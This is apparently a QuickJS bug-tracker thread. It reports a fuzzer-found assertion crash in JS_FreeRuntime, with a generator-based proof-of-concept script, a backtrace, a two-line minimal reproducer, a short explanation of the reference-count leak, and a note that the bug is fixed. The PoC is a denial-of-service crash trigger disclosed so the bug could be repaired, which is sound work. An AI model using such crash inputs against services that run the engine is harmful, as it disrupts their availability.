Denial of service

[PwnToday]

Hello, my name is Alex Feklin.
While fuzzing qjs I found a crash "qjs: quickjs.c:1890: JS_FreeRuntime: Assertion `list_empty(&rt->gc_obj_list)' failed. Aborted".

PoC code:

function*collectBuiltinNames(obj, visited = new Set(), result = new Set()) {
if (visited.has(obj))
return;
visited.add(obj);
const properties = Object.getOwnPropertyNames(obj);
for (var i=0; i < properties.length; i++) {
var property = properties[i];
if (property != "collectBuiltinNames" && typeof property != "number")
result.add(property);
if (typeof obj[property] === 'object' && obj[property] !== null)
collectBuiltinNames(obj[property], visited, result);
}
return result;
}
console.log(Array.from(collectBuiltinNames(this)).join('\n'));

Backtrace:

#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7c77859 in __GI_abort () at abort.c:79
#2 0x00007ffff7c77729 in __assert_fail_base (fmt=0x7ffff7e0d588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n",
assertion=0x5555558f09b3 "list_empty(&rt->gc_obj_list)", file=0x5555558f085b "quickjs.c", line=1890,
function=) at assert.c:94
#3 0x00007ffff7c88fd6 in __GI___assert_fail (
assertion=assertion@entry=0x5555558f09b3 "list_empty(&rt->gc_obj_list)",
file=file@entry=0x5555558f085b "quickjs.c", line=line@entry=1890,
function=function@entry=0x5555558ef578 <PRETTY_FUNCTION.11736> "JS_FreeRuntime") at assert.c:103
#4 0x00005555555faa97 in JS_FreeRuntime (rt=0x55555591f2a0) at quickjs.c:1890
#5 0x00005555555673e8 in main (argc=, argv=) at qjs.c:480

[bnoordhuis]

More minimal example:

function* f(r){ return r } // must return r
[...f({})]

r's ref count in async_func_free is 2, not 1, that's why it ends up leaking.

[bellard]

fixed